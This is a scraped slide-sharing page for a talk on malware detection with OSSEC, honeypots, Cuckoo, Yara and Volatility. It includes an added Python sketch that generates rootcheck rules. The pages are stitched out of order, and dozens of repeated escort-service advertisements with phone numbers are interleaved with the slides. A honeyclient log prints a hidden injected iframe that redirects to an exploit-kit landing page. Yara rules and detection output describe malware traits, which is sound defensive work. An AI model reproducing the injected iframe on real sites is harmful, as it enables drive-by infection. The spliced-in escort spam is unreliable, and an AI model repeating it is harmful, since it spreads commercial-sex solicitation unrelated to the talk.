File: C:\Users\IEUser\AppData\Local\Temp\AcroRD32.exe.
Reference: 0A37D49E798F50C8F1010D5CFDE0E851 .
Demo – Alert for Trojan Dropper
Future Work
• Use/create Cuckoo signatures to identify different
malware patterns (droppers, downloaders, trojans,
rootkits, …)
• Create Cuckoo reporting module to report (JSON)
on those patterns that OSSEC can detect.
• Python tool to parse module output and generate
rootcheck rules.
• Add/improve OSSEC malware detection capabilities.
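The rootcheck rule for the Trojan Dropper (the `[Trojan Dropper] [all] [md5]` block with its `f:`, `r:` and `p:` lines) was written by hand from what Cuckoo observed. The third item of the future work list is a Python tool that does this from Cuckoo's report. The code below is an added sketch of such a tool, not the author's and not part of OSSEC or Cuckoo: it assumes a report with the layout of a Cuckoo 1.x behavior summary (`behavior.summary.files`, `behavior.summary.keys`, `behavior.processes[].process_name`, `target.file.md5`), keeps only executables dropped under user-writable directories and only writes to Run/RunOnce keys, and emits the rule in the `win_malware_rcl.txt` syntax shown above. The sample report is constructed from the values on the Trojan Dropper slides, with one benign file and one benign key added to show the filtering.

```python
import json
import ntpath
import sys

# Constructed report fragment in the shape of a Cuckoo 1.x behavior summary (assumed layout,
# not taken from the deck); the values mirror the Trojan Dropper slides, plus one benign file
# and one benign registry key so that the filtering below has something to discard.
SAMPLE_REPORT = {
    "target": {"file": {"md5": "0A37D49E798F50C8F1010D5CFDE0E851"}},
    "behavior": {
        "summary": {
            "files": [
                "C:\\Users\\IEUser\\AppData\\Local\\Temp\\AcroRD32.exe",
                "C:\\Windows\\System32\\kernel32.dll",
            ],
            "keys": [
                "HKEY_USERS\\S-1-5-21-3463664321-2923530833-3546627382-1000"
                "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Acroread",
                "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
            ],
        },
        "processes": [{"process_name": "AcroRD32.exe"}],
    },
}

# Where droppers usually write their payload; system directories are left out on purpose.
INTERESTING_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\")
PERSISTENCE_KEY_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")


def dropped_files(summary):
    """Executables written under user-writable directories."""
    return [f for f in summary.get("files", [])
            if f.lower().endswith(".exe") and any(d in f.lower() for d in INTERESTING_DIRS)]


def persistence_entries(summary):
    """(key, value_name) pairs for values written under Run / RunOnce."""
    out = []
    for key in summary.get("keys", []):
        parent, _, value = key.rpartition("\\")
        if parent.lower().endswith(PERSISTENCE_KEY_SUFFIXES):
            out.append((parent, value))
    return out


def build_rootcheck_rule(report, rule_name, match="all"):
    """Render one win_malware_rcl.txt entry: header, then f:, r: and p: checks."""
    summary = report["behavior"]["summary"]
    md5 = report["target"]["file"]["md5"]
    files = dropped_files(summary)
    exe_names = sorted({ntpath.basename(f) for f in files})
    lines = [f"[{rule_name}] [{match}] [{md5}]"]
    lines += [f"f:{path};" for path in files]
    for parent, value in persistence_entries(summary):
        for exe in exe_names:
            # Same shape as the deck's rule: key -> value name -> regex on the value's data.
            lines.append(f"r:{parent} -> {value} -> r:{exe};")
    for proc in report["behavior"].get("processes", []):
        name = proc.get("process_name", "")
        if name in exe_names:
            lines.append(f"p:r:{name};")
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python3 cuckoo2rootcheck.py report.json "Trojan Dropper" [any|all]
    if len(sys.argv) >= 3:
        with open(sys.argv[1]) as fh:
            report = json.load(fh)
        print(build_rootcheck_rule(report, sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else "all"))
    else:
        print(build_rootcheck_rule(SAMPLE_REPORT, "Trojan Dropper"))
```

Two things to decide before appending the output to the shared rcl file. `[all]` requires every line to match on the agent, which keeps false positives low but misses a variant that changes any one of file name, value name or process name; `[any]` is the opposite trade. And an `r:` line carrying the sandbox user's SID under HKEY_USERS only matches that SID, so a rule meant for other hosts needs the key rewritten for the local users' hives.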
Thank you!
santiago@alienvault.com
@santiagobassett

 
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...aakahthapa70
 
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...teencall080
 
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...riyasharma00119
 
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...aakahthapa70
 
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...aakahthapa70
 
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARJAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARNiteshKumar82226
 
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...aakahthapa70
 
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579diyaspanoida
 
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US  Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Call US  Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Pooja Nehwal
 
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579diyaspanoida
 
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRVAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRNiteshKumar82226
 
SANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLSANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLNiteshKumar82226
 
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls  in Goa %(9316020077)# Russian Call Girls  in Goa By Russi...Russian Call Girls  in Goa %(9316020077)# Russian Call Girls  in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...Goa Call Girls Service Goa escort agency
 
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Availablenitugupta1209
 
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.riyadelhic riyadelhic
 
JABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KJABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KNiteshKumar82226
 

Kürzlich hochgeladen (20)

Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
Hot Vip Call Girls Service In Sector 149,9818099198 Young Female Escorts Serv...
 
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North GoaCALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
CALL GIRLS 9999288940 women seeking men Locanto No Advance North Goa
 
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
Call Now ☎9870417354|| Call Girls in Dwarka Escort Service Delhi N.C.R.
 
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
Call Girls In {{Connaught Place Delhi}}96679@38988 Indian Russian High Profil...
 
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
+91-9310611641 Russian Call Girls In New Delhi Independent Russian Call Girls...
 
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
Low Rate Russian Call Girls In Lajpat Nagar ➡️ 7836950116 Call Girls Service ...
 
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
Call Girls In {Green Park Delhi} 9667938988 Indian Russian High Profile Girls...
 
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
Call Girls In {{Laxmi Nagar Delhi}} 9667938988 Indian Russian High Profile Es...
 
Call Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up Night
Call Girls In  Goa  For Fun 9316020077 By  Goa  Call Girls For Pick Up NightCall Girls In  Goa  For Fun 9316020077 By  Goa  Call Girls For Pick Up Night
Call Girls In Goa For Fun 9316020077 By Goa Call Girls For Pick Up Night
 
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGARJAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
JAMNAGAR CALL GIRLS 92628/71154 JAMNAGAR
 
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
Call Girls In {Laxmi Nagar Delhi} 9667938988 Indian Russian High Profile Girl...
 
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
Best VIP Call Girls Noida Sector 23 Call Me: 8700611579
 
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US  Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...Call US  Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
Call US Pooja📞 9892124323 ✅Call Girls In Mira Road ( Mumbai ) secure service...
 
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
Best VIP Call Girl Noida Sector 48 Call Me: 8700611579
 
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIRVAPI CALL GIRL 92628/71154 VAPI CALL GIR
VAPI CALL GIRL 92628/71154 VAPI CALL GIR
 
SANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALLSANGLI CALL GIRL 92628/71154 SANGLI CALL
SANGLI CALL GIRL 92628/71154 SANGLI CALL
 
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
Russian Call Girls  in Goa %(9316020077)# Russian Call Girls  in Goa By Russi...Russian Call Girls  in Goa %(9316020077)# Russian Call Girls  in Goa By Russi...
Russian Call Girls in Goa %(9316020077)# Russian Call Girls in Goa By Russi...
 
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
9811611494,Low Rate Call Girls In Connaught Place Delhi 24hrs Available
 
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
Call Now ☎9870417354|| Call Girls in Noida Sector 18 Escort Service Noida N.C.R.
 
JABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR KJABALPUR CALL GIRL 92628/71154 JABALPUR K
JABALPUR CALL GIRL 92628/71154 JABALPUR K
 

Malware detection with OSSEC

  • 5. Honeypot results
    • Captured 126 unique binaries in 3 months
    • Highly detected by clamav (80%)

    santiago@dionaea:/opt/dionaea/var/dionaea/binaries# clamscan *
    022aeb126d2d80e683f7f2a3ee920874: Trojan.Spy-78857 FOUND
    05800e1eb163994359e4c946d4a0fecb: Backdoor.Floder-3 FOUND
    06267149140c0bc9ba51222c165f2d61: Worm.Autorun-7683 FOUND
    0682f3dfbdab7c040ac9307c50792d0a: Trojan.Buzus-9369 FOUND
    074b815d9ded01b516a62e3b739caa10: Win.Trojan.Agent-372503 FOUND
    07fea379703307c5addc20e237cdd0f0: Win.Trojan.Jorik-1388 FOUND
    09481313331ff5a8b8bfa4e25cbaa524: Worm.Autorun-7516 FOUND
    0a9f1cd12f1b34ca71fa585e87e91c7d: OK
    0b4c4078231ee36731080858187a49b8: Win.Trojan.Injector-8166 FOUND
    0feae931ee71a495614f14f3c1d37246: Trojan.Mybot-5073 FOUND
    10ec7cb47314a2c08decb25e53fedcfa: Trojan.Injector-558 FOUND
    1205a52e42687c922aa4d3700d778398: Trojan.Kazy-1372 FOUND
    12fb7332920a7797c2d02df29b57c640: Trojan.Spy-78857 FOUND
    16b0357b804d9651d9057b61d78bee08: Win.Trojan.Agent-368816 FOUND
    1a813b6ea08a47f2997e2e4215eba96b: WIN.Trojan.IRCBot-1225 FOUND
    …
    ----------- SCAN SUMMARY -----------
    Known viruses: 3517573
    Engine version: 0.98.1
    Scanned directories: 0
    Scanned files: 126
    Infected files: 101
    Data scanned: 17.65 MB
    Data read: 18.11 MB (ratio 0.97:1)
    Time: 56.447 sec (0 m 56 s)

  • 6. Honeyclient
    Thug: Low interaction honeyclient, used to detect drive-by-download attacks.
    https://github.com/buffer/thug (Python)
    Thug emulates:
    • Core browser functionality
    • ActiveX controls
    • Browser plugins

  • 7. Drive-by download attack
    http://urlquery.net/report.php?id=1410227505197

  • 8. Honeyclient results
    santiago@mwcollector:~/thug/src$ ./thug.py webgalleriet.no/
    [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment-reply.js?ver=20090102 (Status: 200, Referrer: http://www.webgalleriet.no/)
    [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment-reply.js?ver=20090102 (Content-type: application/javascript, MD5: d484fa08997df765852c6ad283ec52c6)
    [2014-09-11 22:58:31] <iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="http://168bet.com/cocs.html?j=1095012" width="2"></iframe>
    [2014-09-11 22:58:31] [iframe redirection] http://www.webgalleriet.no/ -> http://168bet.com/cocs.html?j=1095012
    [2014-09-11 22:58:31] [URL Classifier] URL: http://168bet.com/cocs.html?j=1095012 (Rule: Redkit 1, Classification: Landing page, Exploit Kit)

  • 9. Malware crawlers
    Retrieve files using malware tracking sites.
    https://github.com/technoskald/maltrieve (Python)
    https://code.google.com/p/malware-crawler/ (Python)

    http://malc0de.com/rss
    http://www.malwareblacklist.com/mbl.xml
    http://www.malwaredomainlist.com/hostslist/mdl.xml
    http://vxvault.siri-urz.net/URL_List.php
    http://urlquery.net/
    http://support.clean-mx.de/clean-mx/xmlviruses.php

  • 11. Malware crawlers results
    • Captured 345 unique binaries in 15 minutes
    • Poorly detected by clamav (16%)

    santiago@mwcollector:~/binaries/maltrieve$ clamscan *
    02d36dff08b63b123d2d2a36089e3d97: OK
    03a6ac145099cf77bf5c7af127696687: OK
    03e49fb415aacf9d2c90821ff0596024: OK
    0568a72d4c5a2eb510207ca45b8d8799: OK
    06ddb91e1d5f056590dfeef71a2da264: JS.Iframe-2 FOUND
    074fbceca8fe84bae582a7a114b2ce94: HTML.Iframe-63 FOUND
    0889504acc370f2adec7869b9bc5bc5c: OK
    08d53833d032d71c1e7ffd3cddcd2a5e: JS.Iframe-2 FOUND
    0ac790c459a0ef9bb4959321918a2d57: OK
    0cc1c5c2ef510bd9f587abbc402d04a3: OK
    0e3c692048a35c06ffe81a473ffd1d41: OK
    136264a09b94bf8f08278b0045a84905: OK
    13e78b2bab4a0ae9a3c2003d3f004dd1: JS.Obfus-31 FOUND
    ----------- SCAN SUMMARY -----------
    Known viruses: 3517100
    Engine version: 0.98.4
    Scanned directories: 0
    Scanned files: 235
    Infected files: 38
    Data scanned: 164.24 MB
    Data read: 143.86 MB (ratio 1.14:1)
    Time: 254.462 sec (4 m 14 s)

  • 12. Malware database - Viper
    Binary analysis and management framework.
    https://github.com/botherder/viper (Python)

  • 13. Static Analysis - Yara
    Flexible, human-readable rules for identifying malicious streams.
    Can be used to analyze:
    • files
    • memory (volatility)
    • network streams.

    private rule APT1_RARSilent_EXE_PDF
    {
        meta:
            author = "AlienVault Labs"
            info = "CommentCrew-threat-apt1"
        strings:
            $winrar1 = "WINRAR.SFX" wide ascii
            $winrar2 = ";The comment below contains SFX script commands" wide ascii
            $winrar3 = "Silent=1" wide ascii
            $str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
            $str2 = "Steup=\"" wide ascii
        condition:
            all of ($winrar*) and 1 of ($str*)
    }

  • 14. Static Analysis - Yara
    viper > find name 3f2fda43121d888428b66717b984a7fb
    +---+----------------------------------+-----------------------+----------------------------------+------+
    | # | Name                             | Mime                  | MD5                              | Tags |
    +---+----------------------------------+-----------------------+----------------------------------+------+
    | 1 | 3F2FDA43121D888428B66717B984A7FB | application/x-dosexec | 3f2fda43121d888428b66717b984a7fb | apt  |
    +---+----------------------------------+-----------------------+----------------------------------+------+
    viper > open -l 1
    [*] Session opened on /home/santiago/viper/binaries/6/a/f/2/6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e
    viper 3F2FDA43121D888428B66717B984A7FB > yara scan
    [*] Scanning 3F2FDA43121D888428B66717B984A7FB (6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e)
    +------------------+--------+--------+----------------------------------+
    | Rule             | String | Offset | Content                          |
    +------------------+--------+--------+----------------------------------+
    | APT1_WEBC2_TABLE | $msg1  | 440032 | Fail To Execute The Command      |
    | APT1_WEBC2_TABLE | $msg2  | 440060 | Execute The Command Successfully |
    | APT1_WEBC2_TABLE | $gif1  | 440100 | sdwefa.gif                       |
    | APT1_WEBC2_TABLE | $gif1  | 440101 | dwefa.gif                        |
    | APT1_WEBC2_TABLE | $gif1  | 440102 | wefa.gif                         |
    | APT1_WEBC2_TABLE | $gif1  | 440103 | efa.gif                          |
    | APT1_WEBC2_TABLE | $gif1  | 440104 | fa.gif                           |
    | APT1_WEBC2_TABLE | $gif1  | 440105 | a.gif                            |
    | APT1_WEBC2_TABLE | $gif2  | 440112 | GIF89                            |
    +------------------+--------+--------+----------------------------------+

    rule APT1_WEBC2_TABLE
    {
        meta:
            author = "AlienVault Labs"
            info = "CommentCrew-threat-apt1"
        strings:
            $msg1 = "Fail To Execute The Command" wide ascii
            $msg2 = "Execute The Command Successfully" wide ascii
            $gif1 = /\w+\.gif/
            $gif2 = "GIF89" wide ascii
        condition:
            3 of them
    }

    viper 3F2FDA43121D888428B66717B984A7FB > yara rules
    +----+-----------------------------------+
    | #  | Path                              |
    +----+-----------------------------------+
    | 1  | data/yara/hangover.yara           |
    | 2  | data/yara/citizenlab.yara         |
    | 3  | data/yara/APT_NGO_wuaclt_PDF.yara |
    | 4  | data/yara/kins.yara               |
    | 5  | data/yara/themask.yara            |
    | 6  | data/yara/vmdetect.yara           |
    | 7  | data/yara/index.yara              |
    | 8  | data/yara/GeorBotBinary.yara      |
    | 9  | data/yara/leverage.yar            |
    | 10 | data/yara/apt1.yara               |
    | 11 | data/yara/GeorBotMemory.yara      |
    | 12 | data/yara/rats.yara               |
    | 13 | data/yara/embedded.yara           |
    | 14 | data/yara/urausy_skypedat.yar     |
    | 15 | data/yara/fpu.yara                |
    +----+-----------------------------------+

  • 15. Static Analysis – Trojan Dropper
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe sections
    [*] PE Sections:
    +--------+---------+-------------+-------------+---------------+
    | Name   | RVA     | VirtualSize | RawDataSize | Entropy       |
    +--------+---------+-------------+-------------+---------------+
    | .text  | 0x1000  | 0xbe8f      | 49152       | 6.52204488284 |
    | .rdata | 0xd000  | 0x1855      | 6656        | 5.17849300065 |
    | .data  | 0xf000  | 0x19cb8     | 512         | 1.31023024266 |
    | .CRT   | 0x29000 | 0x10        | 512         | 0.21310128451 |
    | .rsrc  | 0x2a000 | 0x7fd8      | 32768       | 5.79943302325 |
    +--------+---------+-------------+-------------+---------------+
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe imports
    ...
    [*] DLL: ADVAPI32.dll
      - 0x40d000: RegCloseKey
      - 0x40d004: RegOpenKeyExA
      - 0x40d008: RegQueryValueExA
      - 0x40d00c: RegCreateKeyExA
      - 0x40d010: RegSetValueExA
    ...
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe compiletime
    [*] Compile Time: 2010-03-14 23:27:58
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > yara scan
    [*] Scanning 0A37D49E798F50C8F1010D5CFDE0E851 (dbf0436908c9d900e69ea2a108f08061786d299b511265b78620a4401361084b)
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > fuzzy
    [*] 1 relevant matches found
    +-------+----------------------------------+------------------------------------------------------------------+
    | Score | Name                             | SHA256                                                           |
    +-------+----------------------------------+------------------------------------------------------------------+
    | 68%   | 003EE3D21DF82975337AE976F8BA67CC | 2803fba5fbe908f6151597c2a387caef8f00a5f0f194bfc6b4d9f89026d53621 |
    +-------+----------------------------------+------------------------------------------------------------------+
    viper 0A37D49E798F50C8F1010D5CFDE0E851 > virustotal
    [*] VirusTotal Report:
    +----------------------+----------------------------------------------+
    | Antivirus            | Signature                                    |
    +----------------------+----------------------------------------------+
    | nProtect             | Trojan.Downloader.JKVR                       |
    | McAfee               | Artemis!0A37D49E798F                         |
    | K7GW                 | Trojan-Downloader                            |
    | NANO-Antivirus       | Trojan.Win32.Agent.hbmsz                     |
    | Symantec             | Downloader                                   |
    | TotalDefense         | Win32/FakeDoc_i                              |
    | TrendMicro-HouseCall | TROJ_DLOADER.VTG                             |
    | Avast                | Win32:Trojan-gen                             |
    | ClamAV               | Trojan.Downloader-83571                      |
    | Kaspersky            | Trojan-Downloader.Win32.Agent.thb            |
    | BitDefender          | Trojan.Downloader.JKVR                       |
    | Agnitum              | Trojan.DL.Agent!virRS0ijj7k                  |
    | Emsisoft             | Trojan.Downloader.JKVR (B)                   |
    | Comodo               | TrojWare.Win32.TrojanDownloader.Agent.thb_30 |
    | F-Secure             | Trojan.Downloader.JKVR                       |
    | TrendMicro           | TROJ_DLOADER.VTG                             |
    | McAfee-GW-Edition    | Artemis!0A37D49E798F                         |
    | Sophos               | Troj/DwnLdr-IYR                              |
    | Jiangmin             | TrojanDownloader.Agent.boly                  |
    | Antiy-AVL            | Trojan/Win32.Agent.gen                       |
    | Microsoft            | TrojanDownloader:Win32/Pingbed.A             |
    | Commtouch            | W32/Downloader.NIHT-8726                     |
    | AhnLab-V3            | Dropper/Malware.101512                       |

  • 16. Fuzzy hash match info

  • 17. Dynamic Analysis - Cuckoo
    Automated malware analysis. Runs binary files in virtual machines to study their behavior.
    • Traces Win32 API calls
    • Files created, deleted and downloaded
    • Memory dumps of malicious processes
    • Network traffic pcaps
    Integrated with Yara, VirusTotal and Volatility, among other tools.
    Supports VirtualBox, KVM and VMware.

  • 18. Dynamic Analysis – Trojan Dropper

  • 19. Behavioral Analysis – Filesystem

  • 20. Behavioral Analysis - Filesystem

  • 21. Behavioral Analysis – Network

  • 22. Behavioral Analysis – Network

  • 23. Behavioral Analysis - Network
    santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ sudo tcpdump -s 0 -XX -AA -nn -r dump.pcap | grep -A 4 63.233.155.6
    reading from file dump.pcap, link-type EN10MB (Ethernet)
    23:32:20.655808 IP 8.8.8.8.53 > 192.168.56.103.63943: 53551 1/0/0 A 63.233.155.6 (50)
        0x0000:  0800 2723 f165 0a00 2700 0000 0800 4500  ..'#.e..'.....E.
        0x0010:  004e eca8 0000 2d11 97d7 0808 0808 c0a8  .N....-.........
        0x0020:  3867 0035 f9c7 003a ef52 d12f 8180 0001  8g.5...:.R./....
        0x0030:  0001 0000 0000 0377 7777 0867 6172 7968  .......www.garyh
    --
    23:32:20.662766 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
        0x0000:  0a00 2700 0000 0800 2723 f165 0800 4500  ..'.....'#.e..E.
        0x0010:  0034 10ab 4000 8006 161a c0a8 3867 3fe9  .4..@.......8g?.
        0x0020:  9b06 c00e 0050 9be7 3c9f 0000 0000 8002  .....P..<.......
        0x0030:  2000 e231 0000 0204 05b4 0103 0302 0101  ...1............
    --
    23:32:23.663174 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
        0x0000:  0a00 2700 0000 0800 2723 f165 0800 4500  ..'.....'#.e..E.
        0x0010:  0034 10c2 4000 8006 1603 c0a8 3867 3fe9  .4..@.......8g?.
        0x0020:  9b06 c00e 0050 9be7 3c9f 0000 0000 8002  .....P..<.......
        0x0030:  2000 e231 0000 0204 05b4 0103 0302 0101  ...1............
    --
    23:32:29.661778 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,nop,sackOK], length 0
        0x0000:  0a00 2700 0000 0800 2723 f165 0800 4500  ..'.....'#.e..E.
        0x0010:  0030 10dc 4000 8006 15ed c0a8 3867 3fe9  .0..@.......8g?.
        0x0020:  9b06 c00e 0050 9be7 3c9f 0000 0000 7002  .....P..<.....p.
        0x0030:  2000 f63a 0000 0204 05b4 0101 0402       ...:..........

  • 24. Behavioral Analysis – Registry

  • 25. Memory Analysis - Volatility
    santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py psxview --profile=Win7SP1x86 -f memory.dmp
    Volatility Foundation Volatility Framework 2.4
    Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd
    ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- --------
    0x7b6fa500 audiodg.exe             960 True   False  True     True   True  True    True
    0x7b7afd40 sppsvc.exe             1780 True   False  True     True   True  True    True
    0x779fb808 svchost.exe             724 True   False  True     True   True  True    True
    0x7b7be710 svchost.exe            1892 True   False  True     True   True  True    True
    0x7c4ea7d8 VBoxService.ex          624 True   False  True     True   True  True    True
    0x7b6f4030 svchost.exe             900 True   False  True     True   True  True    True
    0x7b7bb618 svchost.exe            3376 True   False  True     True   True  True    True
    0x7cd99a58 AcroRD32.exe           3080 True   False  True     True   True  True    True
    0x7b4fa030 SearchIndexer.          360 True   False  True     True   True  True    True
    0x7b94a858 taskhost.exe           2920 True   False  True     True   True  True    True
    …

